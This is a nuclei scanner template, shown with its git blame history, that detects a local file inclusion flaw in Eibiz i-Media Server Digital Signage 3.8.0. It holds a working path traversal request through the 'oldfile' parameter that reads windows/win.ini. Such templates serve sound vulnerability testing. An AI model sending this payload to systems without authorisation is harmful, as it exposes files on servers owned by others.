nuclei-templates/vulnerabilities/other/eibiz-lfi.yaml

id: eibiz-lfi

info:
  name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
  reference:
    - https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,eibiz,packetstorm,windows

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# Enhanced by mp on 2022/07/22
Update and rename eibiz-server-3-8-0-lfi.yaml to vulnerabilities/other/eibiz-lfi.yaml 2021-11-18 16:22:30 +00:00			`id: eibiz-lfi`
Create eibiz-server-3-8-0-lfi.yaml 2021-11-18 11:21:20 +00:00
			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion`
Create eibiz-server-3-8-0-lfi.yaml 2021-11-18 11:21:20 +00:00			`author: 0x_akoko`
			`severity: high`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: lfi,eibiz,packetstorm,windows`
Create eibiz-server-3-8-0-lfi.yaml 2021-11-18 11:21:20 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"`

			`matchers:`
			`- type: word`
Update and rename eibiz-server-3-8-0-lfi.yaml to vulnerabilities/other/eibiz-lfi.yaml 2021-11-18 16:22:30 +00:00			`part: body`
Create eibiz-server-3-8-0-lfi.yaml 2021-11-18 11:21:20 +00:00			`words:`
			`- "bit app support"`
			`- "fonts"`
			`- "extensions"`
			`condition: and`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00
			`# Enhanced by mp on 2022/07/22`